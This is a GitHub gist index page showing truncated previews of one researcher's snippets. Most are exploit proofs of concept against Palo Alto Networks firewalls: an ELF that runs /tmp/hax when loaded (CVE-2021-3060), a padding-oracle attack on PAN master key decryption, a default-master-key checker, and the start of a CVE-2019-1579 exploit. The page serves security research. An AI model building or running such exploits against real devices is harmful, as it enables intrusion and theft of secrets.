Skip to content

Instantly share code, notes, and snippets.

rqu1 / badlib.xx
Created September 25, 2022 06:43
.xx formatted dissection of a tiny ELF I made for cve-2021-3060
║ badlib.xx -- a tiny ELF shared object by rqu ║
║ This will exec() /tmp/hax when dlopen()'d or loaded ║
║ Originally released in binary form for my CVE-2021-3060 POC: ║
║ ║
║ build the binary with ║
│ Data │ ELF header │ PHDR │ Code │ Dynamic │
rqu1 /
Last active February 15, 2024 19:00
0day padding oracle in PAN master key decryption
import paramiko
import sys
import requests
pad=lambda n: '\0'*(n+1)+(chr(16-n)*(16-n-1))
block_xor=lambda x,y: ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y))
byte_xor=lambda x,y,z: x[:y]+chr(ord(x[y])^z)+x[y+1:]
set_pad=lambda x,n: block_xor(pad(n), x)
def formatData(d):
rqu1 /
Last active August 4, 2024 16:42
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
class PanCrypt():
rqu1 /
Last active January 11, 2023 23:52
AES-128 in Brainfuck
rqu1 /
Created March 22, 2020 20:49
dst80 python implementation
def bit(x,n): return (x>>n)&1
def bit_slice(x,msb,lsb): return (x&((2<<msb)-1))>>lsb
def bv2i(*args):
for i in args: o=(o<<1)|i
return o
def fa(x): return bit(0x3a35acc5,x)
rqu1 / 8.0 hax
Last active August 4, 2022 12:22
CVE-2019-1579 fun times
#!/usr/bin/env python2
import urllib2
import struct
# Constants
ip_addr= ''
# 8.0